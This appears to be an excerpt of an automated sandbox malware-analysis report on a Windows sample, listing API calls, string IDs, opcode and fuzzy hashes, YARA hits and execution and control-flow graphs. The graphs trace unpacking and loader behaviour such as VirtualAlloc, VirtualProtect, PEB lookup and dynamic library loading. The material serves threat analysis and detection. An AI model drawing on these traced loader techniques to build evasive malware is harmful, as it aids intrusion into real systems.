                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                                                  • String ID: image/png
                                                                                                                                                                                                                                                  • API String ID: 864223233-2966254431
                                                                                                                                                                                                                                                  • Opcode ID: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                                                                                                                                                                                                  • Instruction ID: e538c811f89b171702b8ca366793f889c85100130971bf928fd16bdf8145c3c0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5211737AD0410AFFCB119FA99C8149EBB7AFF45321B20027BEC10B32E0C7759E459A54
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(0000000D,?,0040DE37,0040C64F,?,?,00000000,?,0040C51F,0045D5E4,0040C4EC,0045D5DC,?,ios_base::failbit set,0040C64F), ref: 0040EFA0
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID: <(@
                                                                                                                                                                                                                                                  • API String ID: 1452528299-4189137628
                                                                                                                                                                                                                                                  • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                  • Instruction ID: 966c5171ab2b841c9a1c941c3673e83940a55d69d5d5609413e6151fa891d796
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9711C236200216BFCF129F61DC4496ABB65BB08715B11443AFA46E6290CB70DC219BD5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C54A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                  • String ID: <(@$ios_base::failbit set
                                                                                                                                                                                                                                                  • API String ID: 4194217158-2207043977
                                                                                                                                                                                                                                                  • Opcode ID: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                                                                                                                                                                                                  • Instruction ID: 510b138892f27541a5fc2b77746a8308bc81fd1abdf09eb2229577c7a084af3c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7F0547260022876D2306A5ABC41B97FBCC8F51B65F24843FFD44966C2EBB8A94545EC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA43
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA51
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pContext
                                                                                                                                                                                                                                                  • API String ID: 1687795959-2046700901
                                                                                                                                                                                                                                                  • Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                                                                                                                                                                                                  • Instruction ID: ade17e21382ede40b1a5952a82a6294f61ec456501e49cb394cb07b135f863e7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6F05939B005156BCB04EB59DC45C5EF7A9AF85760310007BFD02E3341DBB8ED068A98
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                  • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                                                  • Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                                                  • Instruction ID: c6f184ec75521e876e515d43f5ba00c5ed257f9a1274f206ffdf003c13f5d3fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90F0A970640224CFDB22EF55E00555D3BB0AF92708F8640ABFC019B261CB3C9E658BAA
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02139764: GetEnvironmentStringsW.KERNEL32 ref: 02139768
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0212FCB6
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0212FCBD
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$EnvironmentStrings
                                                                                                                                                                                                                                                  • String ID: Ub
                                                                                                                                                                                                                                                  • API String ID: 3523873077-2742826647
                                                                                                                                                                                                                                                  • Opcode ID: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                                                                                                                                                                                                                  • Instruction ID: a5499929af51036ea23f1215bfebfaa649c36bb0a9dc4013fed3dd9ba16ff3c7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1E0E513DC5524499732262A7C00E6A0A1A4F81735F11122AFC30C65C2EB64883F09DA
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E32
                                                                                                                                                                                                                                                    • Part of subcall function 0040BF53: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF67
                                                                                                                                                                                                                                                    • Part of subcall function 0040BF53: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFA4
                                                                                                                                                                                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E46
                                                                                                                                                                                                                                                    • Part of subcall function 0040BFFE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C025
                                                                                                                                                                                                                                                    • Part of subcall function 0040BFFE: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C096
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                                  • String ID: F@
                                                                                                                                                                                                                                                  • API String ID: 2118720939-885931407
                                                                                                                                                                                                                                                  • Opcode ID: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
                                                                                                                                                                                                                                                  • Instruction ID: d8e2bd5d7c2d17c0e6b385c3bfe6b7baa890588314637a55e0c2b4eea0cd1ccb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80F058B14002069BEB20AF55C81279DB361FF80715F50843FE945BB2C1CB7CAA44CB8C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D73
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00428D9A
                                                                                                                                                                                                                                                    • Part of subcall function 004285FD: RaiseException.KERNEL32(?,?,0040D874,00000000,00000000,00000000,00000000,?,?,?,?,0040D874,00000000,0045617C,00000000), ref: 0042865D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Access violation - no RTTI data!, xrefs: 00428D6A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                                                                  • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                                                                  • API String ID: 2053020834-2158758863
                                                                                                                                                                                                                                                  • Opcode ID: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
                                                                                                                                                                                                                                                  • Instruction ID: 73ada6d1c6168317e08ecea3a8bb530ed306f4920f562436bdd15de4f867cbc4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDE0DF726593186A9A04DA91B8469DE73EC8A14300BA0041FBE0092082EF2CF958826D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042381E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                                                                                                                                                                  • String ID: jB$nB
                                                                                                                                                                                                                                                  • API String ID: 3275300208-1818383504
                                                                                                                                                                                                                                                  • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                  • Instruction ID: 59cecdb31c0df98e9f45a8df7d3f0483270f31b7733147966a644d233ca5dfda
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20D05E3228C3252AE3346E5DB8017C6BAD88F01764F50C03FF94896682CFB9688882DC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212CB
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004212D9
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pThreadProxy
                                                                                                                                                                                                                                                  • API String ID: 1687795959-3651400591
                                                                                                                                                                                                                                                  • Opcode ID: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                                                                                                                                                                                                  • Instruction ID: 8e926060578bb0aca53d69262477d947a6492ed66be404d99a0d2172ee8e52cc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFD05B31E0020866D700EBB5D806E4E77E85B10708F91457B7D15E6143EB78E5088AAC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CommandLine
                                                                                                                                                                                                                                                  • String ID: %a
                                                                                                                                                                                                                                                  • API String ID: 3253501508-913774005
                                                                                                                                                                                                                                                  • Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                                                                                                                                                                  • Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,<(@,00000000), ref: 0042AF10
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0042AF1E
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF79
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                                  • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                  • Instruction ID: b4e4fd9a0f0a1cd091c58849f1b07b04ac885d72683c28cc61e5c451b31866ac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF413870700222AFCB229F65EA44A6BBBA4EF01310F96416FFC5597291D73C8D11C75A
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02102AA3,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02102AA3,00000000), ref: 0212B177
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0212B185
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02102AA3,00000000), ref: 0212B1E0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                                  • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                  • Instruction ID: 7f97e1341df7d59f6ed7a7cd3552710f2a891324691f30181a1fd1d2ee238e01
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26410630648336AFCB258F64D8447BE7BB5EF01329F154168F869A71A0DB30AB69CB50

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:1.5%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:31.6%
                                                                                                                                                                                                                                                  Signature Coverage:11.2%
                                                                                                                                                                                                                                                  Total number of Nodes:98
                                                                                                                                                                                                                                                  Total number of Limit Nodes:6
                                                                                                                                                                                                                                                  execution_graph 26196 408880 26198 40888f 26196->26198 26197 408ab5 ExitProcess 26198->26197 26199 4088a4 GetCurrentProcessId GetCurrentThreadId 26198->26199 26205 408a9e 26198->26205 26200 4088ca 26199->26200 26201 4088ce SHGetSpecialFolderPathW GetForegroundWindow 26199->26201 26200->26201 26203 408974 26201->26203 26208 43eb20 26203->26208 26212 440240 FreeLibrary 26205->26212 26206 4089cf 26206->26205 26211 40ba80 FreeLibrary FreeLibrary 26206->26211 26213 441850 26208->26213 26210 43eb2a RtlAllocateHeap 26210->26206 26211->26205 26212->26197 26214 441870 26213->26214 26214->26210 26214->26214 26220 40ab12 26221 40ab22 26220->26221 26222 40ab3d WSAStartup 26221->26222 26223 2160005 26228 216092b GetPEB 26223->26228 26225 2160030 26229 216003c 26225->26229 26228->26225 26230 2160049 26229->26230 26244 2160e0f SetErrorMode SetErrorMode 26230->26244 26235 2160265 26236 21602ce VirtualProtect 26235->26236 26238 216030b 26236->26238 26237 2160439 VirtualFree 26241 21604be 26237->26241 26242 21605f4 LoadLibraryA 26237->26242 26238->26237 26239 21604e3 LoadLibraryA 26239->26241 26241->26239 26241->26242 26243 21608c7 26242->26243 26245 2160223 26244->26245 26246 2160d90 26245->26246 26247 2160dad 26246->26247 26248 2160dbb GetPEB 26247->26248 26249 2160238 VirtualAlloc 26247->26249 26248->26249 26249->26235 26250 443190 26252 4431b0 26250->26252 26251 443298 26252->26251 26254 4402c0 LdrInitializeThunk 26252->26254 26254->26251 26255 4434d0 26256 44350f 26255->26256 26257 4434e9 26255->26257 26257->26256 26261 4402c0 LdrInitializeThunk 26257->26261 26259 443538 26259->26256 26262 4402c0 LdrInitializeThunk 26259->26262 26261->26259 26262->26256 26263 602ef5 26264 602ef9 26263->26264 26267 602fee 26264->26267 26268 602ffd 26267->26268 26271 60378e 26268->26271 26276 6037a9 26271->26276 26272 6037b2 CreateToolhelp32Snapshot 26273 6037ce Module32First 26272->26273 26272->26276 26274 602fed 26273->26274 26275 6037dd 26273->26275 26278 60344d 26275->26278 26276->26272 26276->26273 26279 603478 26278->26279 26280 6034c1 26279->26280 26281 603489 VirtualAlloc 26279->26281 26280->26280 26281->26280 26282 4404b1 GetForegroundWindow 26283 4404ce 26282->26283 26289 440cde 26290 440ce8 26289->26290 26290->26290 26292 440dae 26290->26292 26295 4402c0 LdrInitializeThunk 26290->26295 26294 4402c0 LdrInitializeThunk 26292->26294 26294->26292 26295->26292 26296 40a69b 26297 40a770 26296->26297 26297->26297 26302 40b2b0 26297->26302 26299 40a7b9 26300 40b2b0 3 API calls 26299->26300 26301 40a8d9 26300->26301 26303 40b340 26302->26303 26303->26303 26304 40b365 26303->26304 26306 440260 26303->26306 26304->26299 26307 4402a5 26306->26307 26308 440286 26306->26308 26309 440278 26306->26309 26310 44029a 26306->26310 26315 43eb40 26307->26315 26314 44028b RtlReAllocateHeap 26308->26314 26309->26307 26309->26308 26311 43eb20 RtlAllocateHeap 26310->26311 26313 4402a0 26311->26313 26313->26303 26314->26313 26316 43eb53 26315->26316 26317 43eb55 26315->26317 26316->26313 26318 43eb5a RtlFreeHeap 26317->26318 26318->26313 26319 4409b8 26320 4409d0 26319->26320 26322 440a3e 26320->26322 26325 4402c0 LdrInitializeThunk 26320->26325 26323 440a8e 26322->26323 26326 4402c0 LdrInitializeThunk 26322->26326 26325->26322 26326->26323 26215 4406eb 26216 44072e 26215->26216 26217 44070c 26215->26217 26217->26216 26219 4402c0 LdrInitializeThunk 26217->26219 26219->26216

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004088A4
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004088AE
                                                                                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0040896A
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00408AB7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                  • String ID: 6W01
                                                                                                                                                                                                                                                  • API String ID: 4063528623-326071965
                                                                                                                                                                                                                                                  • Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                                                                                                                                                                  • Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 119 40b2b0-40b338 120 40b340-40b349 119->120 120->120 121 40b34b-40b35e 120->121 123 40b700-40b74a 121->123 124 40b661-40b6ab call 408040 121->124 125 40b6b4-40b6ff 121->125 126 40b365-40b367 121->126 127 40b658-40b65c 121->127 128 40b36c-40b5a5 121->128 139 40b750-40b757 123->139 124->125 125->123 131 40ba61-40ba67 126->131 129 40ba52-40ba5e 127->129 132 40b5b0-40b635 128->132 129->131 136 40ba70 131->136 132->132 137 40b63b-40b646 132->137 138 40b64a-40b651 137->138 138->123 138->124 138->125 138->127 138->139 140 40ba00 138->140 141 40b804-40b80b 138->141 142 40b904-40b908 138->142 143 40b7c5 138->143 144 40ba06-40ba0a 138->144 145 40b7cb-40b7d1 138->145 146 40b80d-40b81f 138->146 147 40b90d-40b92d 138->147 148 40b94d-40b954 138->148 149 40b990-40b994 138->149 150 40ba11-40ba16 138->150 151 40b9d8-40b9f4 138->151 152 40b95b-40b970 call 441c40 138->152 153 40b8dc-40b8e6 138->153 154 40ba1d 138->154 155 40b75e-40b76c 138->155 156 40b7e0-40b7e6 138->156 157 40ba23-40ba30 138->157 158 40b9a3-40b9b5 138->158 159 40b8ed-40b902 call 441c40 138->159 160 40b7ef-40b7fd 138->160 161 40b972-40b976 138->161 162 40b934-40b946 138->162 163 40ba35-40ba38 138->163 164 40b97b-40b984 138->164 165 40b9bc-40b9c2 call 440260 138->165 166 40b9fd-40b9ff 138->166 139->136 139->140 139->141 139->142 139->143 139->144 139->145 139->146 139->147 139->148 139->149 139->150 139->151 139->152 139->153 139->154 139->155 139->156 139->157 139->158 139->159 139->160 139->161 139->162 139->163 139->164 139->165 139->166 167 40ba49 139->167 168 40b7a0-40b7bd call 441c40 139->168 169 40ba72-40ba79 139->169 170 40b773 139->170 171 40b779-40b794 call 441c40 139->171 174 40b83c-40b867 141->174 177 40ba3f-40ba42 142->177 143->145 144->136 144->142 144->150 144->152 144->154 144->159 144->161 144->163 144->167 144->168 144->169 144->170 144->171 145->156 175 40b820-40b834 146->175 147->136 147->140 147->142 147->144 147->148 147->149 147->150 147->151 147->152 147->154 147->157 147->158 147->159 147->161 147->162 147->163 147->164 147->165 147->166 147->167 147->168 147->169 147->170 147->171 148->136 148->142 148->152 148->159 148->161 148->167 148->168 148->169 148->170 148->171 186 40b99d 149->186 150->136 150->142 150->152 150->154 150->159 150->161 150->163 150->167 150->168 150->169 150->170 150->171 151->166 152->161 153->136 153->142 153->159 153->167 153->168 153->169 153->170 153->171 155->136 155->167 155->168 155->169 155->170 155->171 156->160 157->149 158->136 158->140 158->142 158->144 158->150 158->151 158->152 158->154 158->159 158->161 158->163 158->165 158->166 158->167 158->168 158->169 158->170 158->171 159->142 160->136 160->140 160->141 160->142 160->144 160->146 160->147 160->148 160->149 160->150 160->151 160->152 160->153 160->154 160->157 160->158 160->159 160->161 160->162 160->163 160->164 160->165 160->166 160->167 160->168 160->169 160->170 160->171 161->163 162->136 162->140 162->142 162->144 162->148 162->149 162->150 162->151 162->152 162->154 162->157 162->158 162->159 162->161 162->163 162->164 162->165 162->166 162->167 162->168 162->169 162->170 162->171 163->177 164->149 189 40b9c7-40b9d1 165->189 166->140 167->129 168->143 171->168 188 40b870-40b8b6 174->188 175->175 187 40b836-40b839 175->187 177->167 186->158 187->174 188->188 192 40b8b8-40b8d5 188->192 189->136 189->140 189->142 189->144 189->150 189->151 189->152 189->154 189->159 189->161 189->163 189->166 189->167 189->168 189->169 189->170 189->171 192->136 192->140 192->142 192->144 192->147 192->148 192->149 192->150 192->151 192->152 192->153 192->154 192->157 192->158 192->159 192->161 192->162 192->163 192->164 192->165 192->166 192->167 192->168 192->169 192->170 192->171
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
